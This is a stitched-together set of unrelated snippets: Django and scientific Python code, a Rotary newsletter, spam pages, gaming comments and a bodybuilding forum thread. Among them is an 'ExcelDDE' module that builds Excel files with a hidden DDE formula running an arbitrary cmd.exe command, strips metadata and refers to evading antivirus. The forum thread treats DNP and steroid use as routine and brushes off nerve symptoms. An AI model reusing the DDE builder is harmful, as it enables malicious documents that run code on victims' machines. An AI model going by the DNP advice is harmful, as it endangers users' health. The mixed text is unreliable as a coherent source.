template_name = 'auth/login.html'
form_class = LoginForm
def get_success_url(self):
return self.request.POST.get('redirect', '/')
def get_context_data(self, **kwargs):
context = super(LoginView, self).get_context_data(**kwargs)
context['redirect'] = self.request.GET.get('redirect', '/')
return context
class RegisterView(AuthView):
template_name = 'auth/register.html'
form_class = RegisterForm
success_url = '/'
class LogoutView(View):
def get(self, request):
logout(request)
return HttpResponseRedirect('/')
|
Clean Water and Sanitation - the Rotary theme for March is such a big part of life. Thank you for everything you continue to do that makes life healthier, happier, and more successful. We might take these things for granted but we know others are not so fortunate. That’s where Rotary makes a big difference. Your gifts to The Rotary Foundation provide funding for grants that might help build cisterns, purchase water filters, and much more. Let’s keep up the good work going through Foundation giving.
It seems to be a natural flow to move from clean water and sanitation to Child and Maternal Health as a monthly theme. There are opportunities of service in all these areas, near our homes or elsewhere.
Rotarians from all over the Midwest met in Itasca, IL early in March when they gathered for a weekend of training at Midwest PETS. Presidents-Elect, Nominees and other leaders returned home ready and eager to move on into the new Rotary year on July 1st. Let’s give everyone all the support we can so their year is fulfilling and successful.
Rotary Youth Programs are alive and well and growing in District 6220. Rotary clubs in Rhinelander, Stevens Point, Sturgeon Bay and Waupaca are currently sponsoring Interact Clubs. The newest club, the Interact Club of North Appleton is sponsored by the Rotary Club of Appleton. Interactors are students 12-18 years of age. Other clubs are working on plans to start an Interact club in their community.
Rotary clubs in Houghton and Hancock sponsor a Rotaract club at Michigan Tech University, the 3 Marquette Rotary Clubs sponsor Rotaract in their community. Rotaractors are young adults 18-30, sometimes college students, other times young adults working in their community wanting to be of service. A Rotaract Club can be a combination of both!
Our district has a strong Rotary Youth Exchange (RYE) program with an outstanding leadership committee. These exchanges are both long term (during the school year - up to 10-11 months) and short term exchanges (usually one month in another country with a host brother or sister and family and then a month here in our country.) These exchanges often blossom into life long friendships.
We are fortunate to have a strong Rotex group in district 6220. Rotex is a group of former exchange students who want to stay connected to Rotary. Many of these younger adults are college students, others are currently in the work force. They have their own meetings raise their own funds and are a big help at RYE conferences. They share their exchange experiences with the students (and their families) who are going out on exchange. The energy of all these young people is amazing. They are the future of Rotary as well as the world. Our support of these programs will help them grow. This is our investment in the future.
Congratulations to clubs that are collaborating with others to make an impact in their communities and around the world. The Rotary Club of Ishpeming is forming a partnership with local government offices and others to create a beach area at a lake nearby. This will be a good improvement and make this lake a “go to place” for families.
The Rotary Club of Shawano was recently awarded a grant that will be used in partnership with others in that community to make improvements on the Mountain Bay Trail.
The Rotary Club of Appleton, Appleton Breakfast and Appleton continue to collaborate with clubs in Neenah and Menasha. The club presidents meet monthly to plan and implement projects that benefit the entire Fox River Valley area. When clubs join forces the impact just multiplies!
A reminder to join us at DUALCON 2019, our district conference May 17-18th in Wisconsin Dells. Go to www.DUALCON2019.com to register and learn more.
Thank you for your service and dedication, you are Inspiring!
|
# -*- coding: utf-8 -*-
"""
Framework for code to synthesise a library of spectra.
"""
import argparse
import hashlib
import json
import logging
import os
import re
import sqlite3
import time
from os import path as os_path
from fourgp_speclib import SpectrumLibrarySqlite, Spectrum
from fourgp_specsynth import TurboSpectrum
from fourgp_telescope_data import FourMost
class Synthesizer:
# Convenience function to provide dictionary access to rows of an astropy table
@staticmethod
def astropy_row_to_dict(x):
return dict([(i, x[i]) for i in x.columns])
# Read input parameters
def __init__(self, library_name, logger, docstring, root_path="../../../..", spectral_resolution=50000):
self.logger = logger
self.our_path = os_path.split(os_path.abspath(__file__))[0]
self.root_path = os_path.abspath(os_path.join(self.our_path, root_path, ".."))
self.pid = os.getpid()
self.spectral_resolution = spectral_resolution
parser = argparse.ArgumentParser(description=docstring)
parser.add_argument('--output-library',
required=False,
default="turbospec_{}".format(library_name),
dest="library",
help="Specify the name of the SpectrumLibrary we are to feed synthesized spectra into.")
parser.add_argument('--workspace', dest='workspace', default="",
help="Directory where we expect to find spectrum libraries.")
parser.add_argument('--create',
required=False,
action='store_true',
dest="create",
help="Create a clean SpectrumLibrary to feed synthesized spectra into")
parser.add_argument('--no-create',
required=False,
action='store_false',
dest="create",
help="Do not create a clean SpectrumLibrary to feed synthesized spectra into")
parser.set_defaults(create=True)
parser.add_argument('--log-dir',
required=False,
default="/tmp/turbospec_{}_{}".format(library_name, self.pid),
dest="log_to",
help="Specify a log directory where we log our progress and configuration files.")
parser.add_argument('--dump-to-sqlite-file',
required=False,
default="",
dest="sqlite_out",
help="Specify an sqlite3 filename where we dump the stellar parameters of the stars.")
parser.add_argument('--line-lists-dir',
required=False,
default=self.root_path,
dest="lines_dir",
help="Specify a directory where line lists for TurboSpectrum can be found.")
parser.add_argument('--elements',
required=False,
default="",
dest="elements",
help="Only read the abundances of a comma-separated list of elements, and use scaled-solar "
"abundances for everything else.")
parser.add_argument('--binary-path',
required=False,
default=self.root_path,
dest="binary_path",
help="Specify a directory where Turbospectrum and Interpol packages are installed.")
parser.add_argument('--every',
required=False,
default=1,
type=int,
dest="every",
help="Only process every nth spectrum. "
"This is useful when parallelising this script across multiple processes.")
parser.add_argument('--skip',
required=False,
default=0,
type=int,
dest="skip",
help="Skip n spectra before starting to process every nth. "
"This is useful when parallelising this script across multiple processes.")
parser.add_argument('--limit',
required=False,
default=0,
type=int,
dest="limit",
help="Only process a maximum of n spectra.")
self.args = parser.parse_args()
logging.info("Synthesizing {} to <{}>".format(library_name, self.args.library))
# Set path to workspace where we create libraries of spectra
self.workspace = (self.args.workspace if self.args.workspace else
os_path.abspath(os_path.join(self.our_path, root_path, "workspace")))
os.system("mkdir -p {}".format(self.workspace))
def set_star_list(self, star_list):
self.star_list = star_list
# Ensure that every star has a name; number stars of not
for i, item in enumerate(self.star_list):
if 'name' not in item:
item['name'] = "star_{:08d}".format(i)
# Ensure that every star has free_abundances and extra metadata
for i, item in enumerate(self.star_list):
if 'free_abundances' not in item:
item['free_abundances'] = {}
if 'extra_metadata' not in item:
item['extra_metadata'] = {}
if 'microturbulence' not in item:
item['microturbulence'] = 1
# Ensure that we have a table of input data to dump to SQLite, if requested
for item in self.star_list:
if 'input_data' not in item:
item['input_data'] = {'name': item['name'],
'Teff': item['Teff'],
'[Fe/H]': item['[Fe/H]'],
'logg': item['logg']}
item['input_data'].update(item['free_abundances'])
item['input_data'].update(item['extra_metadata'])
if 'name' not in item['input_data']:
item['input_data']['name'] = item['name']
def dump_stellar_parameters_to_sqlite(self):
# Output data into sqlite3 db
if self.args.sqlite_out:
os.system("rm -f {}".format(self.args.sqlite_out))
conn = sqlite3.connect(self.args.sqlite_out)
c = conn.cursor()
columns = []
for col_name, col_value in list(self.star_list[0]['input_data'].items()):
col_type_str = isinstance(col_value, str)
columns.append("{} {}".format(col_name, "TEXT" if col_type_str else "REAL"))
c.execute("CREATE TABLE stars (uid INTEGER PRIMARY KEY, {});".format(",".join(columns)))
for i, item in enumerate(self.star_list):
print(("Writing sqlite parameter dump: %5d / %5d" % (i, len(self.star_list))))
c.execute("INSERT INTO stars (name) VALUES (?);", (item['input_data']['name'],))
uid = c.lastrowid
for col_name in item['input_data']:
if col_name == "name":
continue
arguments = (
str(item['input_data'][col_name]) if isinstance(item['input_data'][col_name], str)
else float(item['input_data'][col_name]),
uid
)
c.execute("UPDATE stars SET %s=? WHERE uid=?;" % col_name, arguments)
conn.commit()
conn.close()
def create_spectrum_library(self):
# Create new SpectrumLibrary
self.library_name = re.sub("/", "_", self.args.library)
self.library_path = os_path.join(self.workspace, self.library_name)
self.library = SpectrumLibrarySqlite(path=self.library_path, create=self.args.create)
# Invoke FourMost data class. Ensure that the spectra we produce are much higher resolution than 4MOST.
# We down-sample them later to whatever resolution we actually want.
self.FourMostData = FourMost()
self.lambda_min = self.FourMostData.bands["LRS"]["lambda_min"]
self.lambda_max = self.FourMostData.bands["LRS"]["lambda_max"]
self.line_lists_path = self.FourMostData.bands["LRS"]["line_lists_edvardsson"]
# Invoke a TurboSpectrum synthesizer instance
self.synthesizer = TurboSpectrum(
turbospec_path=os_path.join(self.args.binary_path, "turbospectrum-15.1/exec-gf-v15.1"),
interpol_path=os_path.join(self.args.binary_path, "interpol_marcs"),
line_list_paths=[os_path.join(self.args.lines_dir, self.line_lists_path)],
marcs_grid_path=os_path.join(self.args.binary_path, "fromBengt/marcs_grid"))
self.synthesizer.configure(lambda_min=self.lambda_min,
lambda_max=self.lambda_max,
lambda_delta=float(self.lambda_min) / self.spectral_resolution,
line_list_paths=[os_path.join(self.args.lines_dir, self.line_lists_path)],
stellar_mass=1)
self.counter_output = 0
# Start making log output
os.system("mkdir -p {}".format(self.args.log_to))
self.logfile = os.path.join(self.args.log_to, "synthesis.log")
def do_synthesis(self):
# Iterate over the spectra we're supposed to be synthesizing
with open(self.logfile, "w") as result_log:
for star in self.star_list:
star_name = star['name']
unique_id = hashlib.md5(os.urandom(32)).hexdigest()[:16]
metadata = {
"Starname": str(star_name),
"uid": str(unique_id),
"Teff": float(star['Teff']),
"[Fe/H]": float(star['[Fe/H]']),
"logg": float(star['logg']),
"microturbulence": float(star["microturbulence"])
}
# User can specify that we should only do every nth spectrum, if we're running in parallel
self.counter_output += 1
if (self.args.limit > 0) and (self.counter_output > self.args.limit):
break
if (self.counter_output - self.args.skip) % self.args.every != 0:
continue
# Pass list of the abundances of individual elements to TurboSpectrum
free_abundances = dict(star['free_abundances'])
for element, abundance in list(free_abundances.items()):
metadata["[{}/H]".format(element)] = float(abundance)
# Propagate all ionisation states into metadata
metadata.update(star['extra_metadata'])
# Configure Turbospectrum with the stellar parameters of the next star
self.synthesizer.configure(
t_eff=float(star['Teff']),
metallicity=float(star['[Fe/H]']),
log_g=float(star['logg']),
stellar_mass=1 if "stellar_mass" not in star else star["stellar_mass"],
turbulent_velocity=1 if "microturbulence" not in star else star["microturbulence"],
free_abundances=free_abundances
)
# Make spectrum
time_start = time.time()
turbospectrum_out = self.synthesizer.synthesise()
time_end = time.time()
# Log synthesizer status
logfile_this = os.path.join(self.args.log_to, "{}.log".format(star_name))
open(logfile_this, "w").write(json.dumps(turbospectrum_out))
# Check for errors
errors = turbospectrum_out['errors']
if errors:
result_log.write("[{}] {:6.0f} sec {}: {}\n".format(time.asctime(),
time_end - time_start,
star_name,
errors))
logging.warn("Star <{}> could not be synthesised. Errors were: {}".
format(star_name, errors))
result_log.flush()
continue
else:
logging.info("Synthesis completed without error.")
# Fetch filename of the spectrum we just generated
filepath = os_path.join(turbospectrum_out["output_file"])
# Insert spectrum into SpectrumLibrary
try:
filename = "spectrum_{:08d}".format(self.counter_output)
# First import continuum-normalised spectrum, which is in columns 1 and 2
metadata['continuum_normalised'] = 1
spectrum = Spectrum.from_file(filename=filepath, metadata=metadata, columns=(0, 1), binary=False)
self.library.insert(spectra=spectrum, filenames=filename)
# Then import version with continuum, which is in columns 1 and 3
metadata['continuum_normalised'] = 0
spectrum = Spectrum.from_file(filename=filepath, metadata=metadata, columns=(0, 2), binary=False)
self.library.insert(spectra=spectrum, filenames=filename)
except (ValueError, IndexError):
result_log.write("[{}] {:6.0f} sec {}: {}\n".format(time.asctime(), time_end - time_start,
star_name, "Could not read bsyn output"))
result_log.flush()
continue
# Update log file to show our progress
result_log.write("[{}] {:6.0f} sec {}: {}\n".format(time.asctime(), time_end - time_start,
star_name, "OK"))
result_log.flush()
def clean_up(self):
logging.info("Synthesized {:d} spectra.".format(self.counter_output))
# Close TurboSpectrum synthesizer instance
self.synthesizer.close()
|
Don't Just Browse Online Dating Success Stories - Become One! Sign Up With Afro Romance Today And Start Meeting White Singles In The La Trinite Sur Mer Area.
Find Someone Who Shares Your Interests And Your Zip Code With AfroRomance - We Have Plenty Of White Singles Conveniently Located In La Trinite Sur Mer!
Double your chances of finding love: when you join AfroRomance, you are introduced to hundreds of hot White singles in La Trinite Sur Mer. Sign up with us today and you could be meeting the man or woman of your dreams tomorrow! At AfroRomance find someone with similar interests as yourself and start your romantic journey with us.
Now it's easier than ever to make that connection - sign up with AfroRomance and meet hot and White singles in La Trinite Sur Mer online today! Thanks to our fantastic dating system at AfroRomance, for no charge you can join us, create a profile, and browse the profiles of members before deciding if you'd like to start getting to know them better.
|
"""
Program name: MPS-Proba
Program purpose: The Alpha version of the APC 524 project.
File name: projectionboys.py
File purpose: the projection boys model
Responsible person: Bin Xu
"""
from numpy import zeros
import numpy as np
from model import Model
class ProjectionBoys(Model):
"""
A probablistic model that describes the model in human language and gives some parameters.
"""
def __init__(self, size, p0, p1, q1, q2, init_state):
super(ProjectionBoys, self).__init__()
self.size = size
self.p0 = p0
self.p1 = p1
self.q1 = q1
self.q2 = q2
self.init_state = init_state
self.model_type = "ProjectionBoys"
self.hamiltonian = r"H = p0 I + \sum_{i=1}^{n-1}\frac{p 1}{n-1}\sigma_i^x\otimes\sigma_{i+1}^x + \frac{q 1}{n-1}\pi_i^+\otimes\pi_{i+1}^- + \frac{q 2}{n-1}\pi_i^+\otimes\pi_{i+1}^-"
self.normalizeTMat()
def normalizeTMat(self):
totalproba = self.p0 + self.p1 + self.q1 + self.q2
self.p0 /= totalproba
self.p1 /= totalproba
self.p1 /= self.size - 1
self.q1 /= totalproba
self.q1 /= self.size - 1
self.q2 /= totalproba
self.q2 /= self.size - 1
def prepareMpo(self):
#initialize the MPO
self.mpo = []
mpo_left = zeros(shape = (2, 2, 1, 5), dtype = float)
mpo_middle = zeros(shape = (2, 2, 5, 5), dtype = float)
mpo_right = zeros(shape = (2, 2, 5, 1), dtype = float)
# remember our convention: phys_in, phys_out, aux_l, aux_r
# mpo_left = [p0 I, p1 Sx, q1 Pi+, q2 Pi-, I]
mpo_left[:, :, 0, 0] = self.p0 * self.I
mpo_left[:, :, 0, 1] = self.p1 * self.sigma_x
mpo_left[:, :, 0, 2] = self.q1 * self.pi_plus
mpo_left[:, :, 0, 3] = self.q2 * self.pi_minus
mpo_left[:, :, 0, 4] = self.I
# mpo_middle = [I, 0, 0, 0, 0]
# [Sx, 0, 0, 0, 0]
# [pi+, 0, 0, 0, 0]
# [pi-, 0, 0, 0, 0]
# [0, p1 Sx, q1 pi+, q2 pi-, I]
mpo_middle[:, :, 0, 0] = self.I
mpo_middle[:, :, 1, 0] = self.sigma_x
mpo_middle[:, :, 2, 0] = self.pi_plus
mpo_middle[:, :, 3, 0] = self.pi_minus
mpo_middle[:, :, 4, 1] = self.p1 * self.sigma_x
mpo_middle[:, :, 4, 2] = self.q1 * self.pi_plus
mpo_middle[:, :, 4, 3] = self.q2 * self.pi_minus
mpo_middle[:, :, 4, 4] = self.I
# mpo_right = [I, Sx, pi+, pi-, 0].transpose
mpo_right[:, :, 0, 0] = self.I
mpo_right[:, :, 1, 0] = self.sigma_x
mpo_right[:, :, 2, 0] = self.pi_plus
mpo_right[:, :, 3, 0] = self.pi_minus
# store the list of mpo's
self.mpo.append(mpo_left)
for i in range(self.size-2):
self.mpo.append(mpo_middle)
self.mpo.append(mpo_right)
def prepareMps(self):
self.mps = []
if self.init_state == "all down":
for i in range(self.size):
new_mps = zeros(shape = (2, 1, 1), dtype = float)
new_mps[0, 0, 0] = 1
self.mps.append(new_mps)
elif type(self.init_state) == list:
if len(self.init_state) != self.size:
raise Exception("The size of the initial condition does not match with the size of the model.")
for i in range(self.size):
new_mps = zeros(shape = (2, 1, 1), dtype = float)
if self.init_state[i] == 0:
new_mps[0, 0, 0] = 1
elif self.init_state[i] == 1:
new_mps[1, 0, 0] = 1
else:
raise Exception("Initial condition can only have 0 or 1 for this model.")
self.mps.append(new_mps)
else:
raise Exception("Initial condition not supported!")
def prepareTransitionalMat(self):
#create sigma_x matrix
sigmax = np.matrix(self.sigma_x)
pi_plus = np.matrix(self.pi_plus).T
pi_minus = np.matrix(self.pi_minus).T
#non changing channel
self.H = self.p0*np.identity(2**self.size) # not changing states
# sigma_x channel
for i in range(self.size-1):
Tmatrix = np.identity(1)
for j in range(self.size):
if j == i or j == i+1:
Tmatrix = np.kron(Tmatrix, sigmax)
else:
Tmatrix = np.kron(Tmatrix, np.identity(2))
self.H = np.add(self.H, Tmatrix * self.p1)
# pi+ channel
for i in range(self.size-1):
Tmatrix = np.identity(1)
for j in range(self.size):
if j == i or j == i+1:
Tmatrix = np.kron(Tmatrix, pi_plus)
else:
Tmatrix = np.kron(Tmatrix, np.identity(2))
self.H = np.add(self.H, Tmatrix * self.q1)
# pi- channel
for i in range(self.size-1):
Tmatrix = np.identity(1)
for j in range(self.size):
if j == i or j == i+1:
Tmatrix = np.kron(Tmatrix, pi_minus)
else:
Tmatrix = np.kron(Tmatrix, np.identity(2))
self.H = np.add(self.H, Tmatrix * self.q2)
def prepareExactInitState(self):
self.init_exact = np.zeros((2**self.size, 1))
if self.init_state == "all down":
self.init_exact[0] = 1
else:
raise Exception("Init state not supported!")
def __repr__(self):
return ( "Hamiltonian: "+self.hamiltonian + "\nSystem length = "+str(self.size)+"\nremain_proba = "+str(self.remain_proba) +"\ninitial state: "+self.init_state)
|
Morning by Morning has long been a favorite devotional because of the simple yet profound, practical and deeply spiritual insights from the "Prince of Preachers", Charles Haddon Spurgeon. The 366 succinct devotions will inspire and enrich today's busy readers in a wonderful way. This delightful, compact volume features: a luxleather foiled cover; gilt-edged pages; an attached ribbon page marker and a presentation page for gift-giving.
|
# -*- coding: utf-8 -*-
from django.core.cache import get_cache
from kway import settings, utils
def get_value_for_key(key, default_value = None):
cache = get_cache(settings.KWAY_CACHE_NAME)
localized_key = utils.get_localized_key(key)
value = None
if cache:
value = cache.get(localized_key, None)
if value:
cache.set(localized_key, value)
cache.close()
return value or default_value
def set_value_for_key(key, value):
cache = get_cache(settings.KWAY_CACHE_NAME)
localized_key = utils.get_localized_key(key)
if cache:
if value:
cache.set(localized_key, value)
else:
cache.delete(localized_key)
cache.close()
return value
def update_values_post_save(sender, instance, **kwargs):
if kwargs['created']:
return
cache = get_cache(settings.KWAY_CACHE_NAME)
if cache:
for language in settings.KWAY_LANGUAGES:
language_code = language[0]
localized_key = utils.get_localized_key(instance.key, language_code)
localized_value_field_name = utils.get_localized_value_field_name(language_code)
localized_value = getattr(instance, localized_value_field_name)
cache.set(localized_key, localized_value)
cache.close()
|
Stats: 6'1 and 205lb with 12% bf trying to go down to 8-9.
I have been using anavar (and creatine) at 30mg for 3 weeks now (I cant take test, recovery is too heavy, have done bloods after anavar before and bounced right back unlike test) and DNP at a 200mg dosage for the last 5 days. Today is day 6 and I have been having a tingling/prickling sensation on the bottom of my feet/toes like Ive been sitting on my legs for too long. This happened when I sat at my desk, and when I started walking around the feeling dissipated slowly. I also have this feeling around my shins, almost feels like shin splints. I know I am holding a I need to read the rules post.I need to read the rules post.I need to read the rules post.I need to read the rules post.ton of water because my abs were visible, but look blurry now and am drinking 1.5 gallon a day.
I am thinking the cause is fluids because the dosage (200mg) is so low, and the duration too, im only 6 days in. Can neuropathy develop this fast, or is this because of too much electrolytes flushing out of my body because of the combo anavar + dnp + creatine.
I dont think its PN. Yet.
Ive had so many weird sensations while on DNP, never turned into PN.
Doesn't sound like it. When I had it didnt have any issues going up to the shin. Big toe was super sensitive and it wasnt dun being barefoot.
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Attendee'
db.create_table('cert_attendee', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('pub_date', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=80)),
('email', self.gf('django.db.models.fields.EmailField')(max_length=254)),
))
db.send_create_signal('cert', ['Attendee'])
# Adding M2M table for field events on 'Attendee'
db.create_table('cert_attendee_events', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('attendee', models.ForeignKey(orm['cert.attendee'], null=False)),
('event', models.ForeignKey(orm['events.event'], null=False))
))
db.create_unique('cert_attendee_events', ['attendee_id', 'event_id'])
def backwards(self, orm):
# Deleting model 'Attendee'
db.delete_table('cert_attendee')
# Removing M2M table for field events on 'Attendee'
db.delete_table('cert_attendee_events')
models = {
'cert.attendee': {
'Meta': {'object_name': 'Attendee'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '254'}),
'events': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['events.Event']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'cert.signature': {
'Meta': {'object_name': 'Signature'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'signature': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '80'})
},
'events.event': {
'Meta': {'object_name': 'Event'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'full_description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['geo.Location']"}),
'partners': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['events.Partner']", 'null': 'True', 'blank': 'True'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'signature': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cert.Signature']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'submission_deadline': ('django.db.models.fields.DateTimeField', [], {})
},
'events.partner': {
'Meta': {'object_name': 'Partner'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'geo.location': {
'Meta': {'object_name': 'Location'},
'city': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': "'50'"}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'district': ('django.db.models.fields.CharField', [], {'max_length': "'255'"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'map': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'number': ('django.db.models.fields.CharField', [], {'max_length': "'15'"}),
'postal_code': ('django.db.models.fields.CharField', [], {'max_length': "'50'"}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'reference': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': "'50'"}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '255'})
}
}
complete_apps = ['cert']
|
Imagine a game that draws inspiration from the large scale, multiplayer experience of a title such as Battlefield 3, and combines it with the cops and robbers style of Grant Theft Auto and HEAT. Welcome to POLICE WARFARE; a multiplayer first person shooter set in the world of armed robbery and law enforcement. Players will go toe-to-toe as either a member of the Los Angeles Police SWAT team, or the opposite side of the law, robbing banks as an armed gunman.
They had me at HEAT (my all time favorite movie). At the time of writing this they are very far away from their funding goal ($15664/325000), but there is a month left so who knows what could happen if enough people spread the word. I was actually surprised that the other crowd sourced video game I blogged about was 110% funded when it ended!
Lots more details over at the KickStarter website. Make sure you check it out and even put some of your own money in to back the project if you’re interested.
Thoughts? Are you guys excited about these crowdsourced games, or are you happy with what the major game companies are currently delivering?
I’m a little skeptic to this approach in gamemaking, honestly.
It doesn’t matter how good the team producing it is, or whatever their goals really are, but it all seems to come down to how they’re selling it.
That trailer is pretty awesome, yeah, but it only shows their ambitions and defines their target group, but does squat nothing showing what they’ve accomplished so far except for some pretty damn smooth animations and concept models, and proving that they have a pretty decent video editor too.
I want specifics; will it be made on a new engine or an existing one (effectively reducing their budget by a shitload), will it use any kind of physics simulation, will there be customization, etc, etc.
I’m probably just nitpicking though, hahah.
Good points. I think the one advantage is the small amount of overhead these guys have if it’s currently a “spare time” type thing for them. Like you mentioned if they are not using an existing engine (and no doubt paying huge licencing fees) then what are they doing?
It’s a bit both ways for me, to be honest; I’m all for the idea of developers producing games for the gamers that know what they want, but on the other hand things like these have no formal guarantee of making it.
What if they make an awesome game in the end, but miss out on the budget and can’t afford proper servers to host the game?
People wouldn’t get what they “paid” for or funded, and in case the pledge made it they won’t get it back either. Complicated.
I’m not sure it will make it. I don’t see a lot of people outside of US supporting a SWAT sim.
Pretty ambitious to combine all of those elements.
There’s already game that’s been out for a while now called Payday The Heist, that has taken inspiration from Heat. It can be pretty intense, just make sure you play with some friends as it was designed to be a cooperative experience. PC and PS3 I think are the platforms.
i don’t think i want to play a game where i have to shoot family pets.
dangit! Dave beat me to the pets comment.
I like the concept but you know if it gets released its probably going to catch some serious flack for letting people play as bank robbers and shoot cops ala the taliban controversy that Medal of Honor had.
just do the gta police mod. I looks cool but i am not smart enough to have tried it myself.
I didn’t watch the whole video, and I’m not a big gamer. Way back when (OS Win98) I had MechWarrior and Battletech. Both versions’ 1. I can’t remember which, but on one of the games I was killed almost immediately. I could never play the rest of it, because nothing I could find would let me create a new profile, or try again. The other I played through to the end.
I want to say Battletech was the bad game.
That turned me off to a lot of the FPS market. And that was what I prefer.
would be 100000% dope if they kept as much of the LA county layout.. like.. sunset, and la brea, and stuff… I dunno… I’m down… I love the BF franchise.
|
#!/usr/bin/env python
# encoding: utf-8
# Only enabled on windows
import sys
from collections import OrderedDict
if sys.platform == "win32":
# Download and install pywin32 from https://sourceforge.net/projects/pywin32/files/pywin32/
import win32com.client # @UnresolvedImport
import logging
from modules.excel_gen import ExcelGenerator
from common import utils
class ExcelDDE(ExcelGenerator):
"""
Module used to generate MS ecel file with DDE object attack
"""
def run(self):
logging.info(" [+] Generating MS Excel with DDE document...")
try:
# Get command line
paramDict = OrderedDict([("Cmd_Line",None)])
self.fillInputParams(paramDict)
command = paramDict["Cmd_Line"]
logging.info(" [-] Open document...")
# open up an instance of Excel with the win32com driver\ \\
excel = win32com.client.Dispatch("Excel.Application")
# do the operation in background without actually opening Excel
#excel.Visible = False
workbook = excel.Workbooks.Open(self.outputFilePath)
logging.info(" [-] Inject DDE field (Answer 'No' to popup)...")
ddeCmd = r"""=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c %s'!A1""" % command.rstrip()
excel.Cells(1, 26).Formula = ddeCmd
excel.Cells(1, 26).FormulaHidden = True
# Remove Informations
logging.info(" [-] Remove hidden data and personal info...")
xlRDIAll=99
workbook.RemoveDocumentInformation(xlRDIAll)
logging.info(" [-] Save Document...")
excel.DisplayAlerts=False
excel.Workbooks(1).Close(SaveChanges=1)
excel.Application.Quit()
# garbage collection
del excel
logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
except Exception:
logging.exception(" [!] Exception caught!")
logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
logging.error(" [!] Attempt to force close MS Excel applications...")
objExcel = win32com.client.Dispatch("Excel.Application")
objExcel.Application.Quit()
del objExcel
# If it Application.Quit() was not enough we force kill the process
if utils.checkIfProcessRunning("Excel.exe"):
utils.forceProcessKill("Excel.exe")
|
This Version of 01 high stakes vampiros de las vegas was added on 11-07-2015 in our apps store. It has been downloaded for free by 272 times by our valuable users. Download Latest Version of 01 high stakes vampiros de las vegas for Free. mobile-phones.com.pk is online mobile phone app stock so you come and enjoy unlimited free downloads. Other versions of 01 high stakes vampiros de las vegas may also available in our Mobile App store you can search them from related software category.
Make sure that your mobile phone is compatible for this version of 01 high stakes vampiros de las vegas, Before download 01 high stakes vampiros de las vegas Mobile Phone App you should know about the screen resolution, hardware compatibility of your mobile phone device. If you feel this version is right option for your mobile device then go and download 01 high stakes vampiros de las vegas for absolutely FREE. You can go to Entertainment category for large number of related free downloads. In case of any problem for downloading this version please contact us to solve this problem.
Download Latest Version of 01 high stakes vampiros de las vegas for Free. Mobile Phones is online mobile phone software stock so you come and enjoy unlimited free downloads.
Mobile phone App store to Download Android Apps , Phone apps, 01 high stakes vampiros de las vegas, Best 3d Android Game dialing software, Entertainment software, Travel Apps, Medical Apss, Multimedia Apps, Utilities Apps for absolutely free. Many more stuff waiting for you e.g skype to chat with your family and friends.
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from pytz import UTC
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Project.updated_on'
db.add_column(u'people_project', 'updated_on',
self.gf('django.db.models.fields.DateTimeField')(auto_now=True, default=datetime.datetime(2013, 7, 1, 0, 0, tzinfo=UTC), blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Project.updated_on'
db.delete_column(u'people_project', 'updated_on')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
